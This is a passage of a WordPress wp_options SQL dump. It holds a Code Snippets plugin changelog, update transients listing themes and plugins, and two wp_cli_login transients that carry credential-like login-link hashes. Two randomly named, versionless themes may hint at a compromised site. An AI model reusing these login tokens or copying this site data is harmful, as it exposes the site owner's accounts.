state\";}}}s:5:\"3.9.2\";a:2:{s:7:\"Changed\";a:1:{s:4:\"core\";a:6:{i:0;s:85:\"Introduced a custom scissors icon and updated button title for the TinyMCE extension.\";i:1;s:50:\"Improved back-navigation styling on the edit page.\";i:2;s:78:\"Refined layout for column names and action buttons in the Cloud Snippets list.\";i:3;s:56:\"Enhanced overall styling of cloud-related UI components.\";i:4;s:76:\"Optimized cloud search with more efficient pagination and snippet retrieval.\";i:5;s:83:\"Introduced groundwork to prevent Composer dependency collisions with other plugins.\";}}s:5:\"Fixed\";a:1:{s:4:\"core\";a:2:{i:0;s:80:\"Improved sanitization and normalization across Cloud API and pagination outputs.\";i:1;s:72:\"Resolved various TinyMCE issues reported in the WordPress support forum.\";}}}s:5:\"3.9.1\";a:2:{s:7:\"Changed\";a:1:{s:4:\"core\";a:2:{i:0;s:98:\"Migrated to native CSS direction handling (RTL/LTR) for improved compatibility and simpler styling\";i:1;s:54:\"Updated dependencies to the latest compatible versions\";}}s:5:\"Fixed\";a:1:{s:4:\"core\";a:2:{i:0;s:72:\"Fixed TinyMCE menu button registration to prevent initialization failure\";i:1;s:64:\"Fixed the position of the \'code direction\' control in the editor\";}}}s:5:\"3.9.0\";a:3:{s:5:\"Added\";a:1:{s:4:\"core\";a:2:{i:0;s:100:\"Added contextual notices in the Snippets list table to surface action results and warnings in the UI\";i:1;s:89:\"Expanded Multisite Sharing settings for clearer control over network-wide snippet sharing\";}}s:7:\"Changed\";a:1:{s:4:\"core\";a:1:{i:0;s:147:\"Modernized browser support targets and polished admin UI (clearer row-action badges, improved Pro badge hover, refined active snippet name styling)\";}}s:5:\"Fixed\";a:1:{s:4:\"core\";a:2:{i:0;s:67:\"Fixed REST API pagination to return correct results and page counts\";i:1;s:72:\"Resolved styling selector so the active snippet name highlights reliably\";}}}}}','off'),(860470,'_transient_timeout_wp_cli_login/12e69c-0423da5cdd-aa3aafb8','1765364303','off'),(860471,'_transient_wp_cli_login/12e69c-0423da5cdd-aa3aafb8','{\"user\":47,\"private\":\"$wp$2y$10$RhiVTXlzg7rAvwdQUqTzzuSDQPopcqAooJqczvnRncYCPtOnFf9QW\",\"time\":1765363403}','off'),(860472,'_transient_timeout_wp_cli_login/968c0d-46fab92117-95dae7','1765364347','off'),(860473,'_transient_wp_cli_login/968c0d-46fab92117-95dae7','{\"user\":47,\"private\":\"$wp$2y$10$2P0jmvChG7eJiNwM9\\/.59utBa1bTaBV5g0S0CXqZMdH\\/VK1GuD3jy\",\"time\":1765363447}','off'),(860699,'_site_transient_timeout_theme_roots','1770153291','off'),(860700,'_site_transient_theme_roots','a:10:{s:8:\"36791oo3\";s:7:\"/themes\";s:10:\"ldsmzyfvdm\";s:7:\"/themes\";s:9:\"open-shop\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:16:\"twentytwentyfive\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','off'),(860701,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.9.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.9.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.9.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.9.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.9.1\";s:7:\"version\";s:5:\"6.9.1\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1770151502;s:15:\"version_checked\";s:5:\"6.9.1\";s:12:\"translations\";a:0:{}}','off'),(860704,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1770151503;s:7:\"checked\";a:9:{s:10:\"ldsmzyfvdm\";s:0:\"\";s:9:\"open-shop\";s:5:\"1.4.1\";s:14:\"twentynineteen\";s:3:\"2.1\";s:12:\"twentytwenty\";s:3:\"1.8\";s:16:\"twentytwentyfive\";s:3:\"1.0\";s:16:\"twentytwentyfour\";s:3:\"1.1\";s:15:\"twentytwentyone\";s:3:\"1.7\";s:17:\"twentytwentythree\";s:3:\"1.4\";s:15:\"twentytwentytwo\";s:3:\"1.7\";}s:8:\"response\";a:8:{s:9:\"open-shop\";a:6:{s:5:\"theme\";s:9:\"open-shop\";s:11:\"new_version\";s:5:\"1.6.9\";s:3:\"url\";s:39:\"https://wordpress.org/themes/open-shop/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/open-shop.1.6.9.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"7.0\";}s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"3.2\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.3.2.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"3.0\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.3.0.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:16:\"twentytwentyfive\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfive\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfive/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfive.1.4.zip\";s:8:\"requires\";s:3:\"6.7\";s:12:\"requires_php\";s:3:\"7.2\";}s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfour.1.4.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"2.7\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.2.7.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.6.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.2.1.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','off'),(860994,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1781553248;s:8:\"response\";a:35:{s:29:\"woo-razorpay/woo-razorpay.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:26:\"w.org/plugins/woo-razorpay\";s:4:\"slug\";s:12:\"woo-razorpay\";s:6:\"plugin\";s:29:\"woo-razorpay/woo-razorpay.php\";s:11:\"new_version\";s:5:\"4.8.5\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/woo-razorpay/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/woo-razorpay.4.8.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/woo-razorpay/assets/icon-256x256.png?rev=2257034\";s:2:\"1x\";s:65:\"https://ps.w.org/woo-razorpay/assets/icon-128x128.png?rev=1273156\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/woo-razorpay/assets/banner-772x250.png?rev=2963015\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.9.2\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:55:\"th-advance-product-search/th-advance-product-search.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:39:\"w.org/plugins/th-advance-product-search\";s:4:\"slug\";s:25:\"th-advance-product-search\";s:6:\"plugin\";s:55:\"th-advance-product-search/th-advance-product-search.php\";s:11:\"new_version\";s:5:\"1.4.3\";s:3:\"url\";s:56:\"https://wordpress.org/plugins/th-advance-product-search/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/th-advance-product-search.1.4.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/th-advance-product-search/assets/icon-256x256.gif?rev=3498764\";s:2:\"1x\";s:78:\"https://ps.w.org/th-advance-product-search/assets/icon-128x128.gif?rev=3498764\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/th-advance-product-search/assets/banner-1544x500.gif?rev=3498764\";s:2:\"1x\";s:80:\"https://ps.w.org/th-advance-product-search/assets/banner-772x250.gif?rev=3498764\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:19:\"akismet/akismet.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:3:\"5.7\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/akismet.5.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:49:\"th-all-in-one-woo-cart/th-all-in-one-woo-cart.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:36:\"w.org/plugins/th-all-in-one-woo-cart\";s:4:\"slug\";s:22:\"th-all-in-one-woo-cart\";s:6:\"plugin\";s:49:\"th-all-in-one-woo-cart/th-all-in-one-woo-cart.php\";s:11:\"new_version\";s:5:\"2.3.3\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/th-all-in-one-woo-cart/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/th-all-in-one-woo-cart.2.3.3.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:75:\"https://ps.w.org/th-all-in-one-woo-cart/assets/icon-128x128.gif?rev=3324764\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:77:\"https://ps.w.org/th-all-in-one-woo-cart/assets/banner-772x250.gif?rev=3324764\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:1:{i:0;s:11:\"woocommerce\";}}s:43:\"woo-cart-all-in-one/woo-cart-all-in-one.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:33:\"w.org/plugins/woo-cart-all-in-one\";s:4:\"slug\";s:19:\"woo-cart-all-in-one\";s:6:\"plugin\";s:43:\"woo-cart-all-in-one/woo-cart-all-in-one.php\";s:11:\"new_version\";s:6:\"1.1.23\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/woo-cart-all-in-one/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/woo-cart-all-in-one.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/woo-cart-all-in-one/assets/icon-256x256.gif?rev=3080861\";s:2:\"1x\";s:72:\"https://ps.w.org/woo-cart-all-in-one/assets/icon-128x128.gif?rev=3080861\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/woo-cart-all-in-one/assets/banner-1544x500.jpg?rev=3255843\";s:2:\"1x\";s:74:\"https://ps.w.org/woo-cart-all-in-one/assets/banner-772x250.jpg?rev=3255843\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.0\";s:16:\"requires_plugins\";a:1:{i:0;s:11:\"woocommerce\";}}s:25:\"charitable/charitable.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/charitable\";s:4:\"slug\";s:10:\"charitable\";s:6:\"plugin\";s:25:\"charitable/charitable.php\";s:11:\"new_version\";s:8:\"1.8.11.2\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/charitable/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/charitable.1.8.11.2.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:63:\"https://ps.w.org/charitable/assets/icon-128x128.jpg?rev=1225178\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/charitable/assets/banner-1544x500.png?rev=1751623\";s:2:\"1x\";s:65:\"https://ps.w.org/charitable/assets/banner-772x250.png?rev=1751623\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:31:\"code-snippets/code-snippets.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/code-snippets\";s:4:\"slug\";s:13:\"code-snippets\";s:6:\"plugin\";s:31:\"code-snippets/code-snippets.php\";s:11:\"new_version\";s:5:\"3.9.6\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/code-snippets/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/code-snippets.3.9.6.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:58:\"https://ps.w.org/code-snippets/assets/icon.svg?rev=2148878\";s:3:\"svg\";s:58:\"https://ps.w.org/code-snippets/assets/icon.svg?rev=2148878\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/code-snippets/assets/banner-1544x500.png?rev=3147867\";s:2:\"1x\";s:68:\"https://ps.w.org/code-snippets/assets/banner-772x250.png?rev=3147867\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:45:\"wc-donation-platform/wc-donation-platform.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:34:\"w.org/plugins/wc-donation-platform\";s:4:\"slug\";s:20:\"wc-donation-platform\";s:6:\"plugin\";s:45:\"wc-donation-platform/wc-donation-platform.php\";s:11:\"new_version\";s:5:\"1.4.0\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/wc-donation-platform/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/wc-donation-platform.1.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:65:\"https://ps.w.org/wc-donation-platform/assets/icon.svg?rev=2611888\";s:3:\"svg\";s:65:\"https://ps.w.org/wc-donation-platform/assets/icon.svg?rev=2611888\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/wc-donation-platform/assets/banner-1544x500.jpg?rev=2611888\";s:2:\"1x\";s:75:\"https://ps.w.org/wc-donation-platform/assets/banner-772x250.jpg?rev=2611888\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.1\";s:16:\"requires_plugins\";a:0:{}}s:46:\"themehunk-megamenu-plus/themehunk-megamenu.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:37:\"w.org/plugins/themehunk-megamenu-plus\";s:4:\"slug\";s:23:\"themehunk-megamenu-plus\";s:6:\"plugin\";s:46:\"themehunk-megamenu-plus/themehunk-megamenu.php\";s:11:\"new_version\";s:5:\"1.2.1\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/themehunk-megamenu-plus/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/themehunk-megamenu-plus.1.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/themehunk-megamenu-plus/assets/icon-256x256.png?rev=2377898\";s:2:\"1x\";s:76:\"https://ps.w.org/themehunk-megamenu-plus/assets/icon-128x128.png?rev=2377898\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:78:\"https://ps.w.org/themehunk-megamenu-plus/assets/banner-772x250.png?rev=2377898\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"4.1.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.4.1.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.gif?rev=3444228\";s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.gif?rev=3444228\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=3443226\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=3443226\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.6\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:69:\"estimated-delivery-for-woocommerce/estimated-delivery-woocommerce.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:48:\"w.org/plugins/estimated-delivery-for-woocommerce\";s:4:\"slug\";s:34:\"estimated-delivery-for-woocommerce\";s:6:\"plugin\";s:69:\"estimated-delivery-for-woocommerce/estimated-delivery-woocommerce.php\";s:11:\"new_version\";s:5:\"2.0.0\";s:3:\"url\";s:65:\"https://wordpress.org/plugins/estimated-delivery-for-woocommerce/\";s:7:\"package\";s:83:\"https://downloads.wordpress.org/plugin/estimated-delivery-for-woocommerce.2.0.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:87:\"https://ps.w.org/estimated-delivery-for-woocommerce/assets/icon-256x256.png?rev=3082850\";s:2:\"1x\";s:87:\"https://ps.w.org/estimated-delivery-for-woocommerce/assets/icon-128x128.png?rev=3082850\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:90:\"https://ps.w.org/estimated-delivery-for-woocommerce/assets/banner-1544x500.png?rev=3082850\";s:2:\"1x\";s:89:\"https://ps.w.org/estimated-delivery-for-woocommerce/assets/banner-772x250.png?rev=3082850\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.3\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"5.0\";s:16:\"requires_plugins\";a:0:{}}s:51:\"flexible-product-fields/flexible-product-fields.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:37:\"w.org/plugins/flexible-product-fields\";s:4:\"slug\";s:23:\"flexible-product-fields\";s:6:\"plugin\";s:51:\"flexible-product-fields/flexible-product-fields.php\";s:11:\"new_version\";s:6:\"2.14.4\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/flexible-product-fields/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/flexible-product-fields.2.14.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/flexible-product-fields/assets/icon-256x256.png?rev=2659614\";s:2:\"1x\";s:76:\"https://ps.w.org/flexible-product-fields/assets/icon-128x128.png?rev=2659614\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/flexible-product-fields/assets/banner-1544x500.png?rev=3107939\";s:2:\"1x\";s:78:\"https://ps.w.org/flexible-product-fields/assets/banner-772x250.png?rev=3107939\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.4\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:25:\"forminator/forminator.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/forminator\";s:4:\"slug\";s:10:\"forminator\";s:6:\"plugin\";s:25:\"forminator/forminator.php\";s:11:\"new_version\";s:6:\"1.54.0\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/forminator/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/forminator.1.54.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/forminator/assets/icon-256x256.gif?rev=3443182\";s:2:\"1x\";s:63:\"https://ps.w.org/forminator/assets/icon-128x128.gif?rev=3443182\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/forminator/assets/banner-1544x500.png?rev=2626060\";s:2:\"1x\";s:65:\"https://ps.w.org/forminator/assets/banner-772x250.png?rev=2626060\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.4\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:25:\"gtranslate/gtranslate.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/gtranslate\";s:4:\"slug\";s:10:\"gtranslate\";s:6:\"plugin\";s:25:\"gtranslate/gtranslate.php\";s:11:\"new_version\";s:5:\"3.1.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/gtranslate/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/gtranslate.3.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/gtranslate/assets/icon-256x256.png?rev=2595917\";s:2:\"1x\";s:63:\"https://ps.w.org/gtranslate/assets/icon-128x128.png?rev=2595917\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/gtranslate/assets/banner-1544x500.png?rev=3287209\";s:2:\"1x\";s:65:\"https://ps.w.org/gtranslate/assets/banner-772x250.png?rev=3287209\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"6.0.1\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:33:\"hunk-companion/hunk-companion.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/hunk-companion\";s:4:\"slug\";s:14:\"hunk-companion\";s:6:\"plugin\";s:33:\"hunk-companion/hunk-companion.php\";s:11:\"new_version\";s:5:\"2.0.4\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/hunk-companion/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/hunk-companion.2.0.4.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/hunk-companion/assets/icon-128x128.png?rev=2128262\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/hunk-companion/assets/banner-772x250.png?rev=2128262\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";b:0;s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:25:\"jobboardwp/jobboardwp.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/jobboardwp\";s:4:\"slug\";s:10:\"jobboardwp\";s:6:\"plugin\";s:25:\"jobboardwp/jobboardwp.php\";s:11:\"new_version\";s:5:\"1.3.6\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/jobboardwp/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/jobboardwp.1.3.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/jobboardwp/assets/icon-256x256.png?rev=3082138\";s:2:\"1x\";s:63:\"https://ps.w.org/jobboardwp/assets/icon-128x128.png?rev=3082138\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/jobboardwp/assets/banner-1544x500.png?rev=3082138\";s:2:\"1x\";s:65:\"https://ps.w.org/jobboardwp/assets/banner-772x250.png?rev=3082138\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}s:42:\"landingi-landing-pages/landingi-plugin.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:36:\"w.org/plugins/landingi-landing-pages\";s:4:\"slug\";s:22:\"landingi-landing-pages\";s:6:\"plugin\";s:42:\"landingi-landing-pages/landingi-plugin.php\";s:11:\"new_version\";s:5:\"4.4.0\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/landingi-landing-pages/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/landingi-landing-pages.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/landingi-landing-pages/assets/icon-256x256.png?rev=2340741\";s:2:\"1x\";s:75:\"https://ps.w.org/landingi-landing-pages/assets/icon-128x128.png?rev=2340741\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/landingi-landing-pages/assets/banner-1544x500.png?rev=2340741\";s:2:\"1x\";s:77:\"https://ps.w.org/landingi-landing-pages/assets/banner-772x250.png?rev=2340741\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/landingi-landing-pages/assets/banner-1544x500-rtl.png?rev=2340741\";s:2:\"1x\";s:81:\"https://ps.w.org/landingi-landing-pages/assets/banner-772x250-rtl.png?rev=2340741\";}s:8:\"requires\";s:3:\"4.0\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"8.1\";s:16:\"requires_plugins\";a:0:{}}s:25:\"menu-icons/menu-icons.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/menu-icons\";s:4:\"slug\";s:10:\"menu-icons\";s:6:\"plugin\";s:25:\"menu-icons/menu-icons.php\";s:11:\"new_version\";s:7:\"0.13.23\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/menu-icons/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/plugin/menu-icons.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:63:\"https://ps.w.org/menu-icons/assets/icon-128x128.png?rev=2526860\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/menu-icons/assets/banner-1544x500.jpg?rev=2526847\";s:2:\"1x\";s:65:\"https://ps.w.org/menu-icons/assets/banner-772x250.jpg?rev=2526847\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:47:\"one-click-demo-import/one-click-demo-import.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/one-click-demo-import\";s:4:\"slug\";s:21:\"one-click-demo-import\";s:6:\"plugin\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:11:\"new_version\";s:5:\"3.4.1\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/one-click-demo-import/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/one-click-demo-import.3.4.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-256x256.png?rev=2506685\";s:2:\"1x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-128x128.png?rev=2506685\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.